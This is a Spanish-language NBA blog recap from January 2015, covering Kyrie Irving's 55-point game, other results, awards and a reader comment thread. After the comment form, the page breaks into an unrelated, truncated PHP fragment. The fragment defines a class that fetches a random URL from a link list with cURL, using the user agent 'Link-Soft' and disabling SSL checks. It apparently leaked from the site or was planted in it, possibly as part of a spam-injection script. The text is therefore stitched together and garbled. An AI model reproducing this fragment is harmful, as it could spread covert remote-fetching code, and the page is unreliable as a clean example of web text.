La Crónica: Kyrie es bueno

29 de January de 2015 por MagicJohnson32

Kyrie Irving es bueno. A veces se nos olvida, pero es muy bueno. Lo viene demostrando últimamente, aunque lo de anoche debería servir para que nos acordemos durante una buena época. En ausencia de LeBron James, su exhibición tumbó a todo un equipazo como los Blazers. Kyrie fue el gran protagonista de la jornada pero hubo mucho más, como las victorias de los tres equipos del fondo de la clasificación, incluyendo la de los Knicks sobre unos Thunder que se complican la vida.

Resumimos.

Portland Trail Blazers 94 – Cleveland Cavaliers 99

En la súbita recuperación que protagonizan los Cavs, lo único que les quedaba por lograr era una victoria como la de anoche, prueba inequívoca de que no empiezan y acaban con LeBron James. La ausencia de The King ante un equipo potente como estos Blazers que pugnan por la segunda plaza del Oeste abrió las compuertas del talento de Kyrie Irving, que anoche presenciamos en toda su extensión. El base falló sus primeros 7 lanzamientos, pese a lo que los Cavs lograron ventajas cercanas a los 10 puntos gracias al buen inicio de Love. A partir de ahí, Irving fue un one-man show, indetectable toda la noche para Lillard y la defensa de los Blazers. El equipo dirigido por Stotts no perdió, ni mucho menos la cara al partido, con un LaMarcus nuevamente excelente. Dos tiros libres de Aldridge empataron el marcador con 27 segundos por jugarse y Kyrie respondió como lo vino haciendo toda la noche, con un triple (el undécimo en su cuenta) que decantó definitivamente la balanza y puso la guinda a una de las mejores actuaciones que veremos este año. Son ya ocho triunfos seguidos para los Cavs, que ponen sus miras en una de las primeras cuatro posiciones del Este.

Dallas Mavericks 94 – Houston Rockets 99

También los Rockets lograron una victoria con más implicaciones que las inmediatas del marcador. Pese a seguir sin Howard, se apuntaron el duelo texano frente a los Mavs en la que supone su tercer triunfo seguido y la cuarta derrota consecutiva para Dallas. Y, tal vez la mejor noticia para McHale, esta vez no hizo falta una actuación sobrehumana de Harden. 6 jugadores de los Rockets anotaron 10 o más puntos, incluyendo Terrence Jones en su primer partido desde el 3 de noviembre. Los Mavs, liderados por los 33 puntos de Ellis y los 21 de Parsons, tuvieron posibilidades hasta el final pero acabaron por pagar sus propios errores, especialmente las 23 pérdidas de balón, el rosco de Rondo (0/7 en tiros de campo) y dos tiros libres de Chandler cuando, a 16″ del final y yendo 3 abajo, Harden cometió una flagrante sobre el pívot. Tras los fallos de Chandler, Jones taponó a Monta Ellis y Parsons perdió la posesión en el posterior saque de banda, lo que dejó listo el partido para que Harden sentenciase con dos tiros libres.

Resto de la jornada

Como una alineación astral, Wolves, Sixers y Knicks ganaron anoche. Los Pistons no son los mismos sin Jennings, como demostraron en su esperpéntica derrota en Philadelphia (69-89). Los Wolves siguen últimos pese a ganar (98-110) a los Celtics en el retorno de Kevin Martin de su lesión. Con Martin y Pekovic recuperados, no debería de ser tan raro ver a Minny ganar partidos en adelante. El resultado de mayor trascendencia es el de NY, donde unos Thunder huérfanos de Durant perdieron (92-100) y se alejan a 3,5 partidos de puestos de Playoffs, ya que los Suns vencieron a los Wizards (98-106). Phoenix también abre brecha respecto a los Pelicans, derrotados por unos Nuggets (93-85) de los que uno no sabe qué esperar. Los que casi aburren de tantos partidos como ganan son los Hawks, que ya suman 17 W’s consecutivas y están a solo medio partido de echarle el lazo a los Warriors por el mejor balance de la liga. Atlanta alcanzó su mejor marca histórica de triunfos seguidos al imponerse a los Nets (102-113) con la fórmula habitual y un Millsap estelar. El consuelo de los Nets es que también perdieron sus principales rivales ahora mismo por la octava plaza, Celtics y Hornets. Charlotte, sin Kemba, plantó cara por momentos en San Antonio pero finalmente Popovich pudo celebrar su 66º cumpleaños con una victoria. Sólo nos queda por mencionar que los Clippers sudaron para ganar en Salt Lake City (94-89) y que los Raptors van recuperando el pulso y anoche no tuvieron problema para superar a los Kings (102-119).

PREMIOS

MVP: “Tranquilos que yo estoy aquí”. Ese debió ser el mensaje que quiso mandar Kyrie Irving a su afición ante la baja de LeBron James. Portentosa actuación: 55 puntos con 11 triples de 19 intentos, 10 de 10 en tiros libros, 5 asistencias, 24 puntos de los 28 últimos puntos anotados de su equipo, 16 puntos en el último cuarto… La palabra exhibición se queda muy corta.

Rookie: Justo ayer comentábamos en otros foros que la presencia de Zach LaVine en el partido del All-Stars parecía injusta y hoy se desmarca con 17 puntos, 6 asistencias y 3 robos. El que no estará será Jusuf Nurkic pese a partidos como el de ayer: 15 puntos y 9 rebotes ante Anthony Davis.

Sorpresa: Muy fino estuvo ayer Greivis Vazquez. El venezolano anotó 18 puntos con 4 triples de 5 intentos que complementó con 4 rebotes y 6 asistencias. Y evidentemente no es algo muy sorprendente pero hay que destacar los 28 puntos y 15 rebotes de Paul Millsap.

Decepción: Lo intentó pero no fue el día de Damian Lillard, quien sólo acertó 4 de sus 19 lanzamientos. DeMarcus Cousins anotó 13 puntos y perdió 9 balones. Para desquiciarse.

Mayor esfuerzo en vano: LaMarcus Aldridge se vació ante Kyrie Irving pero tuvo que acabar claudicando. Al final sus 38 puntos y 11 rebotes se fueron al limbo. También los 40 puntos de Russell Westbrook.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

15 comentarios a esta entrada

  1. Nacho dice:
    #1

    40 puntos de Westbrok en 30 lanzamientos (28 si descontamos los 12 TL, eso sí, estos sin fallo)
    Muchas cosas que mirarse en OKC. Cierto que es temporada atípica por las lesiones, pero no por eso deben excusarse. El equipo difícilmente conseguiría ventaja de campo en PO sin esas rachas de lesiones. Brooks está más perdido que la pelota en una jugada loca de Russell, cierto que puede acertar, pero estará mareada.
    Dando por seguro que perderán a Durant, no sé que les espera ni a la franquicia, ni a Westbrok en el futuro. Un talento puro no debería quedarse para Highlights y Esfuerzo en vano del blog.
    Por otro lado, cómo me molaría que los Suns se quedasen con esa plaza de PO.
    Y lanzo una pregunta, porque no he visto apenas a los Pelicans, y sobre el papel tienen buenos nombres ¿La incidencia de Davis en los partidos es proporcional a sus números? y en caso afirmativo, ¿Qué es lo que falla en el equipo?

      Citar

  2. Azabel dice:
    #2

    Nacho:
    Por otro lado, cómo me molaría que los Suns se quedasen con esa plaza de PO.
    Y lanzo una pregunta, porque no he visto apenas a los Pelicans, y sobre el papel tienen buenos nombres ¿La incidencia de Davis en los partidos es proporcional a sus números? y en caso afirmativo, ¿Qué es lo que falla en el equipo?

    que falla? pues nada aparte de las lesiones que han marginado varios juegos a Gordon y a Holiday, el resto esta perfecto, estan 24-22, los que los colocaria sextos en el este comodos, son buenos pero para entrar en PO en el oeste debes ser excelente, sino que lo digan Westbrook y Durant que al parecer los miraran por TV

      Citar

  3. Vader dice:
    #3

    En Pelicans fallan varias cosas por los partidos que yo he visto:

    1) Es un equipo joven y bastante atlético, deberían correr y en cambio intentan jugar un ritmo muy lento.

    2) bastantes bajas por lesiones. Nada muy grave pero nunca estan al completo.

    3) Asik esta jugando bastante peor que en sus etapas en bulls y rockets. Rebotea bien, pero en ataque esta muy negado.

    Saludos

      Citar

  4. Futurman dice:
    #4

    También pasa que les faltan tiradores: Holliday, Gordon y Evans son penetradores y se estorban entre ellos. Mucho merito tiene lo del cejijunto por que encima le buscan menos de lo que deberían. Muchos partidos tira Evans más que él y eso es un pecado.

      Citar

  5. Ruxixón dice:
    #5

    He leído un poco lo que señala Futurman,hay partidos donde el jugador que más tira no es Anthony Davis,y el pobre más o menos tiene que buscarse las habichuelas por si mismo.Señalan a Monty Williams por no confeccionar jugadas para el jugador franquicia.Luego también a nivel defensivo,apartado donde deberían ser TOP dadas las condiciones físicas de sus jugadores no destacan.

      Citar

  6. Triceratops dice:
    #6

    Confirmados los equipos USA y Resto del mundo. Después de 8 años, volveré a ver el partido del viernes de los rookies.

    USA Team: Cody Zeller, Mason Plumlee, Nerlens Noel, Shabazz Muhammad, Kentavious Caldwell-Pope, Victor Oladipo, Trey Burke, Elfrid Payton, Michael Carter-Williams y Zach LaVine.

    World Team: Steven Adams, Gorgui Dieng, Rudy Gobert, Nikola Mirotic, Kelly Olynyk, Bojan Bogdanovic, Andrew Wiggins, Giannis Antetokounmpo, Dennis Schröder y Dante Exum.

      Citar

  7. Azabel dice:
    #7

    Triceratops:
    Confirmados los equipos USA y Resto del mundo. Después de 8 años, volveré a ver el partido del viernes de los rookies.

    USA Team: Cody Zeller, Mason Plumlee, Nerlens Noel, Shabazz Muhammad, Kentavious Caldwell-Pope, Victor Oladipo, Trey Burke, Elfrid Payton, Michael Carter-Williams y Zach LaVine.

    World Team: Steven Adams, Gorgui Dieng, Rudy Gobert, Nikola Mirotic, Kelly Olynyk, Bojan Bogdanovic, Andrew Wiggins, Giannis Antetokounmpo, Dennis Schröder y Dante Exum.

    me parece genial por un lado y una estupidez por el otro,

    me encata una USA vs Resto del mundo, ojala sea un exito y lo copien para los mayores, lo que le daria algo mas de importancia a un juego de las estrellas horribles que termina 142 a 137, una verguenza

    por otra parte, es duro para los rookies, a quien tenemos de esta camada? Wiggins, Exum y Mirotic, por el otro lado a Lavine y Payton (Noel y Bognadovic) aunque es draft anterior, es decir, 5 rookies cuando deberian ser 12, no tiene mucho sentido

      Citar

  8. Triceratops dice:
    #8

    Azabel: me parece genial por un lado y una estupidez por el otro,

    me encata una USA vs Resto del mundo, ojala sea un exito y lo copien para los mayores, lo que le daria algo mas de importancia a un juego de las estrellas horribles que termina 142 a 137, una verguenza

    por otra parte, es duro para los rookies, a quien tenemos de esta camada? Wiggins, Exum y Mirotic, por el otro lado a Lavine y Payton(Noel y Bognadovic)aunque es draft anterior, es decir, 5 rookies cuando deberian ser 12, no tiene mucho sentido

    A mi me parece una idea cojonuda y que devuelve el interés por ver este partido, y encima, con lo patriotas que son los americanos, creo que habrá cierta tensión y no va a ser un desfile de mates sin oposición.
    Y sobre lo que comentas de los rookies, hay 7 (contando a Noel y Bogdanovic) , no está nada mal, y si Randle, Jabari y Embiid no se hubiesen lesionado, estarían seguro.

      Citar

  9. Futurman dice:
    #9

    El rookie que vale va, el que está demasiado verde…puede volver a intentarlo el 2º año 😀 Yo lo veo perfecto, prefiero calidad antes que cantidad.

      Citar

  10. Azabel dice:
    #10

    Futurman: r

    bueno entonces si lo que se busca en calidad y no la “condicion de rookie” no se para que se juega este partido, donde supùestamente se eligen a los jugadores jovenes, a los mejores de ellos, sean lo q sean son rookies, lo mismo con los extranjeros

    alguien cree realmente que Schröder, Exum o Gorbert han hecho méritos para estar o estan unicamente por no ser americanos y gracias

    en todo caso me gusta y quiza mire el juego, va a haber bastante por ganar y los americanos no creo q se relajen deben ganar si o si, y los europeos tienen una buena oportunidad de demostrar su valia

    ##########PUNTO A DESTACAR###########
    NOTABLE LA AUSENCIA DEL NUMERO 1 DEL DRAFT PASADO, NO SOLO PORQUE FUE EL PICK 1 Y POR QUE YA ESTA EN SU SEGUNDO AÑO, SINO POR EL HECHO MUY TRASCENTAL QUE TAMBIEN ES CANADIENSE!!!! ES DECIR, ES DE SEGUNDO AÑO Y EXTRANJERO Y GORBERT, DIENG, OLINYK Y ADAMS LE HAN COMIDO LA TOSTADA, VAYA FIASCO

      Citar

  11. txusma dice:
    #11

    Que Gobert no ha hecho méritos??

      Citar

  12. Futurman dice:
    #12

    Gobert va a ser mejor que DeAndre Jordan y este se va a sacar un máximo o lo va a rondar. Es el tío con brazos más largos de la NBA y encima gana movimientos cada día.

      Citar

  13. Azabel dice:
    #13

    Gorbert podra ser todo lo bueno q digan en el futuro pero en la actualidad es puro potencial, sacando alguns juegos aislados este año no ha hecho gran cosa y el año pasado comio banco todo el curso

      Citar

  14. luismi_vallecas dice:
    #14

    Azabel:
    Gorbert podra ser todo lo bueno q digan en el futuro pero en la actualidad es puro potencial, sacando alguns juegos aislados este año no ha hecho gran cosa y el año pasado comio banco todo el curso

    pero el año pasado se lo pasó dando tumbos entre la liga de desarollo y la NBA… La verdad es que no le había visto jugar mucho hasta el Mundial, pero en el Mundial me encantó. Sin ir más lejos, contra España secó a los Gasol y a Ibaka cuando le tocó cubrirles y se convirtió en el dueño en la zona. Y lo que ha progresado este año con solo 22 años, tela…

      Citar

  15. Triceratops dice:
    #15

    Azabel, en serio crees que Gobert no ha hecho méritos??? Creo que tus comentarios son buenos pero ahi creo que la pifias. Un tío que lleva un mes de Enero promediando 9’4 puntos, 8’9 rebotes y 3 tapones !!! ¿Cómo osas blasfemar contra el francés? si a Gobert lo vas a tener los próximos 8 años en el Top 5 de reboteadores y taponadores!!

    Este tio va camino de convertirse en una bestia parda, ademas es inteligente y no hace filigranas, solo tira cuando toca, que normalmente son mates y palmeos. Este año ya está 5º en tapones en toda la NBA y 1º en progresión a 48 minutos.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>